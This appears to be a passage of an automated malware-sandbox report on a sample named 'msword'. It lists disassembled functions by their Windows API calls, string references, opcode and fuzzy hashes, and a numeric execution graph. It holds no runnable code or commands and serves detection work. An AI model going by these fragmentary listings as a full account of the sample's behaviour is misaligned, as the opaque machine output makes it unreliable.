                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                        • String ID:
                                                                        • API String ID: 1599320355-0
                                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                        Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                        • String ID: Version
                                                                        • API String ID: 512980652-315105994
                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                        Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                        • String ID:
                                                                        • API String ID: 2883127279-0
                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                        • String ID: !N~
                                                                        • API String ID: 623250636-529124213
                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405C48
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                        Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3509786178-2769509956
                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                        Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                        Execution Graph

                                                                        Execution Coverage:4.2%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:2.4%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:46
                                                                        execution_graph 100460 101e463 100472 fe373a 100460->100472 100462 101e479 100463 101e48f 100462->100463 100465 101e4fa 100462->100465 100523 fe5376 60 API calls 100463->100523 100481 feb020 100465->100481 100466 101e4ce 100471 101e4ee Mailbox 100466->100471 100524 104890a 59 API calls Mailbox 100466->100524 100469 101f046 Mailbox 100471->100469 100525 104a48d 89 API calls 4 library calls 100471->100525 100473 fe3758 100472->100473 100474 fe3746 100472->100474 100476 fe375e 100473->100476 100477 fe3787 100473->100477 100526 fe523c 59 API calls 100474->100526 100527 1000fe6 100476->100527 100537 fe523c 59 API calls 100477->100537 100480 fe3750 100480->100462 100566 ff3740 100481->100566 100483 10230b6 100674 104a48d 89 API calls 4 library calls 100483->100674 100485 feb07f 100485->100483 100487 10230d4 100485->100487 100507 febb86 100485->100507 100519 feb132 Mailbox _memmove 100485->100519 100675 104a48d 89 API calls 4 library calls 100487->100675 100489 102355e 100522 feb4dd 100489->100522 100733 104a48d 89 API calls 4 library calls 100489->100733 100491 102318a 100491->100522 100677 104a48d 89 API calls 4 library calls 100491->100677 100495 1023106 100495->100491 100676 fea9de 301 API calls 100495->100676 100498 fe3b31 59 API calls 100498->100519 100499 fe53b0 301 API calls 100499->100519 100500 103730a 59 API calls 100500->100519 100503 1023418 100699 fe53b0 100503->100699 100506 1023448 100506->100522 100727 fe39be 100506->100727 100673 104a48d 89 API calls 4 library calls 100507->100673 100511 10231c3 100678 104a48d 89 API calls 4 library calls 100511->100678 100512 102346f 100731 104a48d 89 API calls 4 library calls 100512->100731 100516 1000fe6 59 API calls Mailbox 100516->100519 100517 fe523c 59 API calls 100517->100519 100518 ff1c9c 59 API calls 100518->100519 100519->100489 100519->100495 100519->100498 100519->100499 100519->100500 100519->100503 100519->100507 100519->100511 100519->100512 100519->100516 100519->100517 100519->100518 100521 fe3c30 68 API calls 100519->100521 100519->100522 100571 fe3add 100519->100571 100578 febc70 100519->100578 100661 fe3a40 100519->100661 100672 fe5190 59 API calls Mailbox 100519->100672 100679 1036c62 59 API calls 2 library calls 100519->100679 100680 105a9c3 85 API calls Mailbox 100519->100680 100681 1036c1e 59 API calls Mailbox 100519->100681 100682 1045ef2 68 API calls 100519->100682 100683 fe3ea3 100519->100683 100732 104a12a 59 API calls 100519->100732 100521->100519 100522->100471 100523->100466 100524->100471 100525->100469 100526->100480 100530 1000fee 100527->100530 100529 1001008 100529->100480 100530->100529 100532 100100c std::exception::exception 100530->100532 100538 100593c 100530->100538 100555 10035d1 DecodePointer 100530->100555 100556 10087cb RaiseException 100532->100556 100534 1001036 100557 1008701 58 API calls _free 100534->100557 100536 1001048 100536->100480 100537->100480 100539 10059b7 100538->100539 100545 1005948 100538->100545 100564 10035d1 DecodePointer 100539->100564 100541 10059bd 100565 1008d58 58 API calls __getptd_noexit 100541->100565 100544 100597b RtlAllocateHeap 100544->100545 100554 10059af 100544->100554 100545->100544 100547 10059a3 100545->100547 100548 1005953 100545->100548 100552 10059a1 100545->100552 100561 10035d1 DecodePointer 100545->100561 100562 1008d58 58 API calls __getptd_noexit 100547->100562 100548->100545 100558 100a39b 58 API calls __NMSG_WRITE 100548->100558 100559 100a3f8 58 API calls 6 library calls 100548->100559 100560 10032cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100548->100560 100563 1008d58 58 API calls __getptd_noexit 100552->100563 100554->100530 100555->100530 100556->100534 100557->100536 100558->100548 100559->100548 100561->100545 100562->100552 100563->100554 100564->100541 100565->100554 100567 ff374f 100566->100567 100570 ff376a 100566->100570 100734 ff1aa4 100567->100734 100569 ff3757 CharUpperBuffW 100569->100570 100570->100485 100572 fe3aee 100571->100572 100573 101d3cd 100571->100573 100574 1000fe6 Mailbox 59 API calls 100572->100574 100575 fe3af5 100574->100575 100576 fe3b16 100575->100576 100738 fe3ba5 59 API calls Mailbox 100575->100738 100576->100519 100579 102359f 100578->100579 100586 febc95 100578->100586 100870 104a48d 89 API calls 4 library calls 100579->100870 100581 febf3b 100581->100519 100585 fec2b6 100585->100581 100587 fec2c3 100585->100587 100652 febca5 Mailbox 100586->100652 100871 fe5376 60 API calls 100586->100871 100872 103700c 301 API calls 100586->100872 100868 fec483 301 API calls Mailbox 100587->100868 100590 fec2ca LockWindowUpdate DestroyWindow GetMessageW 100590->100581 100591 fec2fc 100590->100591 100592 1024509 TranslateMessage DispatchMessageW GetMessageW 100591->100592 100592->100592 100594 1024539 100592->100594 100593 10236b3 Sleep 100593->100652 100594->100581 100595 1000fe6 59 API calls Mailbox 100595->100652 100596 febf54 timeGetTime 100596->100652 100598 102405d WaitForSingleObject 100600 102407d GetExitCodeProcess CloseHandle 100598->100600 100598->100652 100599 fec210 Sleep 100599->100652 100607 fec36b 100600->100607 100603 10243a9 Sleep 100632 102389e Mailbox 100603->100632 100607->100519 100608 fec324 timeGetTime 100869 fe5376 60 API calls 100608->100869 100612 1024440 GetExitCodeProcess 100616 1024456 WaitForSingleObject 100612->100616 100617 102446c CloseHandle 100612->100617 100614 fe6d79 109 API calls 100614->100652 100616->100617 100616->100652 100617->100632 100618 1066562 110 API calls 100618->100632 100620 fe5376 60 API calls 100620->100652 100621 10238aa Sleep 100621->100652 100622 10244c8 Sleep 100622->100652 100623 ff1a36 59 API calls 100623->100632 100628 fe3ea3 68 API calls 100628->100632 100629 fec26d 100863 ff1a36 100629->100863 100630 feb020 279 API calls 100630->100652 100632->100607 100632->100612 100632->100618 100632->100621 100632->100622 100632->100623 100632->100628 100632->100652 100900 ff1207 100632->100900 100905 1042baf 60 API calls 100632->100905 100906 fe5376 60 API calls 100632->100906 100907 fe6cd8 301 API calls 100632->100907 100948 10370e2 59 API calls 100632->100948 100949 10457ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100632->100949 100950 100083e timeGetTime 100632->100950 100951 1044148 CreateToolhelp32Snapshot Process32FirstW 100632->100951 100636 febf25 Mailbox 100636->100581 100867 fec460 10 API calls Mailbox 100636->100867 100638 fe39be 68 API calls 100638->100652 100639 ff1a36 59 API calls 100639->100652 100641 fe5190 59 API calls Mailbox 100641->100652 100642 fe53b0 279 API calls 100642->100652 100643 1036cf1 59 API calls Mailbox 100643->100652 100644 fe3a40 59 API calls 100644->100652 100645 104a48d 89 API calls 100645->100652 100646 1023e13 VariantClear 100646->100652 100647 1037aad 59 API calls 100647->100652 100648 1023ea9 VariantClear 100648->100652 100649 1023c57 VariantClear 100649->100652 100650 fe41c4 59 API calls Mailbox 100650->100652 100651 fe3ea3 68 API calls 100651->100652 100652->100593 100652->100595 100652->100596 100652->100598 100652->100599 100652->100603 100652->100607 100652->100608 100652->100614 100652->100620 100652->100629 100652->100630 100652->100632 100652->100636 100652->100638 100652->100639 100652->100641 100652->100642 100652->100643 100652->100644 100652->100645 100652->100646 100652->100647 100652->100648 100652->100649 100652->100650 100652->100651 100653 fe6cd8 279 API calls 100652->100653 100739 fe52b0 100652->100739 100748 fe9a00 100652->100748 100755 fe9c80 100652->100755 100786 fea820 100652->100786 100803 104c270 100652->100803 100810 104412a 100652->100810 100813 104bcd6 100652->100813 100843 ff42cf 100652->100843 100847 104e4a0 100652->100847 100850 fee36d 100652->100850 100859 105e60c 100652->100859 100862 100083e timeGetTime 100652->100862 100873 ff1c9c 100652->100873 100877 1066655 59 API calls 100652->100877 100878 104a058 59 API calls Mailbox 100652->100878 100879 103e0aa 59 API calls 100652->100879 100880 fe4d37 100652->100880 100898 1036c62 59 API calls 2 library calls 100652->100898 100899 fe38ff 59 API calls 100652->100899 100908 105c355 100652->100908 100653->100652 100662 101d3b1 100661->100662 100666 fe3a53 100661->100666 100663 101d3c1 100662->100663 101829 1036d17 59 API calls 100662->101829 100665 fe3a7d 100668 fe3a83 100665->100668 100669 fe3b31 59 API calls 100665->100669 100666->100665 100671 fe3a9a Mailbox 100666->100671 101820 fe3b31 100666->101820 100668->100671 101828 fe5190 59 API calls Mailbox 100668->101828 100669->100668 100671->100519 100672->100519 100673->100483 100674->100522 100675->100522 100676->100491 100677->100522 100678->100522 100679->100519 100680->100519 100681->100519 100682->100519 101831 fe3c30 100683->101831 100685 fe3eb3 100686 fe3f2d 100685->100686 100687 fe3ebd 100685->100687 101839 fe523c 59 API calls 100686->101839 100688 1000fe6 Mailbox 59 API calls 100687->100688 100690 fe3ece 100688->100690 100692 fe3edc 100690->100692 100693 ff1207 59 API calls 100690->100693 100691 fe3f1d 100691->100519 100694 fe3eeb 100692->100694 100695 ff1bcc 59 API calls 100692->100695 100693->100692 100696 1000fe6 Mailbox 59 API calls 100694->100696 100695->100694 100697 fe3ef5 100696->100697 101838 fe3bc8 68 API calls 100697->101838 100700 fe53cf 100699->100700 100722 fe53fd Mailbox 100699->100722 100702 1000fe6 Mailbox 59 API calls 100700->100702 100701 1002f70 67 API calls __cinit 100701->100722 100702->100722 100703 fe69fa 100704 ff1c9c 59 API calls 100703->100704 100723 fe5569 Mailbox 100704->100723 100705 1000fe6 59 API calls Mailbox 100705->100722 100706 fe69ff 100707 101e691 100706->100707 100708 101f165 100706->100708 101842 104a48d 89 API calls 4 library calls 100707->101842 101846 104a48d 89 API calls 4 library calls 100708->101846 100709 ff1207 59 API calls 100709->100722 100713 101e6a0 100713->100506 100714 101ea9a 100716 ff1c9c 59 API calls 100714->100716 100716->100723 100717 ff1c9c 59 API calls 100717->100722 100719 1037aad 59 API calls 100719->100722 100720 101eb67 100720->100723 101843 1037aad 59 API calls 100720->101843 100722->100701 100722->100703 100722->100705 100722->100706 100722->100707 100722->100709 100722->100714 100722->100717 100722->100719 100722->100720 100722->100723 100724 101ef28 100722->100724 100726 fe5a1a 100722->100726 101840 fe7e50 301 API calls 2 library calls 100722->101840 101841 fe6e30 60 API calls Mailbox 100722->101841 100723->100506 101844 104a48d 89 API calls 4 library calls 100724->101844 101845 104a48d 89 API calls 4 library calls 100726->101845 100728 fe39c9 100727->100728 100729 fe39f0 100728->100729 100730 fe3ea3 68 API calls 100728->100730 100729->100512 100730->100729 100731->100522 100732->100519 100733->100522 100735 ff1ab7 100734->100735 100737 ff1ab4 _memmove 100734->100737 100736 1000fe6 Mailbox 59 API calls 100735->100736 100736->100737 100737->100569 100738->100576 100740 fe52c6 100739->100740 100744 fe5313 100739->100744 100741 fe52d3 PeekMessageW 100740->100741 100740->100744 100742 fe52ec 100741->100742 100741->100744 100742->100652 100744->100742 100745 101df68 TranslateAcceleratorW 100744->100745 100746 fe533e PeekMessageW 100744->100746 100747 fe5352 TranslateMessage DispatchMessageW 100744->100747 100961 fe359e 100744->100961 100745->100744 100745->100746 100746->100742 100746->100744 100747->100746 100749 fe9a1d 100748->100749 100750 fe9a31 100748->100750 100966 fe94e0 100749->100966 101000 104a48d 89 API calls 4 library calls 100750->101000 100752 fe9a28 100752->100652 100754 1022478 100754->100754 100756 fe9cb5 100755->100756 100757 fe9d1f 100756->100757 100758 102247d 100756->100758 100769 fe9d79 100756->100769 100763 ff1207 59 API calls 100757->100763 100757->100769 100759 fe53b0 301 API calls 100758->100759 100760 1022492 100759->100760 100785 fe9f50 Mailbox 100760->100785 101013 104a48d 89 API calls 4 library calls 100760->101013 100761 ff1207 59 API calls 100761->100769 100764 10224d8 100763->100764 101014 1002f70 100764->101014 100765 1002f70 __cinit 67 API calls 100765->100769 100767 10224fa 100767->100652 100768 fe39be 68 API calls 100768->100785 100769->100761 100769->100765 100769->100767 100772 fe9f3a 100769->100772 100769->100785 100770 fe53b0 301 API calls 100770->100785 100772->100785 101017 104a48d 89 API calls 4 library calls 100772->101017 100774 fea775 101021 104a48d 89 API calls 4 library calls 100774->101021 100777 10227f9 100777->100652 100778 fe4230 59 API calls 100778->100785 100780 104a48d 89 API calls 100780->100785 100784 fea058 100784->100652 100785->100768 100785->100770 100785->100774 100785->100778 100785->100780 100785->100784 101009 ff1bcc 100785->101009 101018 1037aad 59 API calls 100785->101018 101019 105ccac 301 API calls 100785->101019 101020 105bc26 301 API calls Mailbox 100785->101020 101022 fe5190 59 API calls Mailbox 100785->101022 101023 1059ab0 301 API calls Mailbox 100785->101023 100787 1022d51 100786->100787 100790 fea84c 100786->100790 101103 104a48d 89 API calls 4 library calls 100787->101103 100789 1022d62 100789->100652 100791 1022d6a 100790->100791 100799 fea888 _memmove 100790->100799 101104 104a48d 89 API calls 4 library calls 100791->101104 100794 1000fe6 59 API calls Mailbox 100794->100799 100795 1022dae 101105 fea9de 301 API calls 100795->101105 100797 fe53b0 301 API calls 100797->100799 100798 1022dc8 100800 fea975 100798->100800 101106 104a48d 89 API calls 4 library calls 100798->101106 100799->100794 100799->100795 100799->100797 100799->100798 100799->100800 100801 fea962 100799->100801 100800->100652 100801->100800 101102 105a9c3 85 API calls Mailbox 100801->101102 100804 fe4d37 84 API calls 100803->100804 100805 104c286 100804->100805 101107 1044005 100805->101107 100807 104c28e 100808 104c292 GetLastError 100807->100808 100809 104c2a7 100807->100809 100808->100809 100809->100652 101267 104494a GetFileAttributesW 100810->101267 100814 104bcf5 100813->100814 100815 104bdbb Mailbox 100813->100815 101271 fe502b 100814->101271 100818 fe4d37 84 API calls 100815->100818 100841 104bdc3 Mailbox 100815->100841 100817 104bd00 100821 fe502b 59 API calls 100817->100821 100819 104bdf3 100818->100819 100820 fe4d37 84 API calls 100819->100820 100822 104be05 100820->100822 100823 104bd14 100821->100823 101287 1043ce2 100822->101287 